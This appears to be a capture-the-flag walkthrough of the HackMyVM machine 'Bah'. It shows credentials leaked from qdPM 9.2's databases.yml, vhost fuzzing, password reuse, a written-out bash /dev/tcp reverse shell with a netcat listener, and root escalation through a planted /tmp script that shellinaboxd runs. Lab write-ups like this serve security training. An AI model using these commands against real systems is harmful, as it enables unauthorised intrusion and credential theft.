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Bah Writeup – HackMyVM – Walkthrough

bah hackmyvm writeup walkthrough security

Bah is an easy machine from HackMyVm by SML. This machine works on VirtualBox. We get to learn basic concepts of pentesting from this machine. “Bah Writeup – HackMyVM – Walkthrough”

Get the IP address of the target

Firstly, I identified the IP address of the machine.

fping -aqg 10.0.0/24
image 265
The IP address is

Scan open ports

Next, I scanned the open ports on the target. This would inform me about the exposed services.

sudo nmap -v -T4 -p- -A -oN nmap.log  
image 266
Nmap scan result shows ports 80 and 3306 are open

From the nmap scan, we can see that HTTP and MySQL services are running on the target.

Enumerate the webserver

We see a qdPM 9.2 login page on the webserver.

image 267
The login page of qdPM reveals version 9.2

qdPM is a web-based project management system. This particular version suffers from information disclosure giving us credentials of the database.

From the path “/core/config/databases.yml”, I got the credentials.

image 268
Database credentials

Therefore, I logged into the MySQL server. Then, I saw a database named “hidden”.

mysql -s -h -uqpmadmin -p
image 269
Database list

Similarly, I checked the tables of the database “hidden”. From one of the tables, “url”, I got some domain names. Thus, I had to identify the one that works. You are seeing the output in tabbed formats because of the -s (silent) option. I did this because I had to copy these values and the table formatting would be a nuisance.

image 270
Table “url” of hidden
SELECT url FROM url;
image 271
The output selected to copy in a new file

In this way, I copied the URLs to a new file “urls.txt” in my local machine as follows.

image 272
URLs on the target

Then, I bruteforced the hosts.

ffuf -c -r -u -H "HOST: FUZZ"  -w urls.txt
image 273
party.bah.hmv has a different response than others

It looks like we have a hostname party.bah.hmv on the target. Therefore, I added that on my /etc/hosts as follows.

image 274
Host added on the machine

Upon visiting the host, we see a shell in a box instance.

image 275
Shell in a box instance.

I tried the password of qpmadmin that I found earlier from the databse.yml file.

image 276
Logged in as qpmadmin

Although the shell looks good, I cannot do many operations like copy, paste, etc. on it. Therefore, I spawned a reverse shell on port 9001 of my machine. Next, I upgraded the shell.

Upgrade to an intelligent reverse shell

On the local machine:

nc -nlvp 9001

On the shell in a box instance:

bash -i >& /dev/tcp/ 0>&1

User privilege escalation

We can see another user named “rocio” on the machine.

image 277
Users of the machine

Similarly, on the table “users”, we have the password of the user.

image 278
Password of rocio

Using the password, I could switch to the user.

su -l rocio
image 279
Switched to the user rocio

Root privilege escalation

For root privilege escalation, we need “pspy” to snoop on processes. Therefore, I downloaded the binary to /tmp directory from my local machine.

On my local machine where the binary pspy64 is present.

python3 -m http.server

On the target machine:

cd /tmp
chmod +x pspy64
image 280
pspy64 shows a command

We see a command of shellinaboxd. The flag -s is used to start services. We can see the following from the manual page of the binary.

image 281
Manual of shellinaboxd

Hence, this means that /devel in the webapp will invoke /tmp/dev of the target machine by the user root. Thus, we can create an executable script named “dev” on /tmp that would give us a reverse shell. I am listening on port 9002 for this.

image 283
Reverse shell code

Finally, I visited at party.bah.hmv/devel to spawn the reverse shell.

image 284
Reverse shell spawned as the user root

Next, I upgraded the shell and captured the root flag.

image 285
Root flag

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